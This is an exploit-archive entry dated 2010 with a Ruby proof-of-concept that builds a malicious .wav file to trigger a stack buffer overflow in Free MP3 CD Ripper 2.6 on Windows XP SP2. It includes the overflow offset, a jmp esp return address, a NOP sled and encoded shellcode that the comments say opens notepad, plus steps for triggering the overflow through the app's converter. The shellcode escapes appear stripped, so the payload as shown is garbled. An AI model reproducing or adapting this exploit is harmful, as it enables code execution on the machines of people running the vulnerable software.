freemp3cd-exec.txt
Posted on 03 April 2010
# Exploit Title: Free MP3 CD Ripper 2.6 0 day # Date: 30/03/2010 # Author: Richard leahy # Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html # Version: 2.6 # Tested on: Windows Xp Sp2 #to exploit this open up the application select file -> wav converter -> wav to mp3 #use your favourite programming language and print out the contents into a text file. save the text file as a .wav #then open up the wav file and boom. #feel free to email me leahy_rich@hotmail.com #code nop = "x90" #imagehlp jmp_esp = [0x76cafa32].pack('V') #shellcode opens notepad shellcode = "xd9xc7xd9x74x24xf4xbaxccx7axcbxf7x33xc9xb1" + "x33x5ex83xeexfcx31x56x13x03x9ax69x29x02xde" + "x66x24xedx1ex77x57x67xfbx46x45x13x88xfbx59" + "x57xdcxf7x12x35xf4x8cx57x92xfbx25xddxc4x32" + "xb5xd3xc8x98x75x75xb5xe2xa9x55x84x2dxbcx94" + "xc1x53x4fxc4x9ax18xe2xf9xafx5cx3fxfbx7fxeb" + "x7fx83xfax2bx0bx39x04x7bxa4x36x4ex63xcex11" + "x6fx92x03x42x53xddx28xb1x27xdcxf8x8bxc8xef" + "xc4x40xf7xc0xc8x99x3fxe6x32xecx4bx15xcexf7" + "x8fx64x14x7dx12xcexdfx25xf6xefx0cxb3x7dxe3" + "xf9xb7xdaxe7xfcx14x51x13x74x9bxb6x92xcexb8" + "x12xffx95xa1x03xa5x78xddx54x01x24x7bx1exa3" + "x31xfdx7dxa9xc4x8fxfbx94xc7x8fx03xb6xafxbe" + "x88x59xb7x3ex5bx1ex47x75xc6x36xc0xd0x92x0b" + "x8dxe2x48x4fxa8x60x79x2fx4fx78x08x2ax0bx3e" + "xe0x46x04xabx06xf5x25xfex69x96xadx64x06x09" + "x2ax67xec" boom = "x41" * 4112 + jmp_esp + nop * 10 + shellcode puts boom
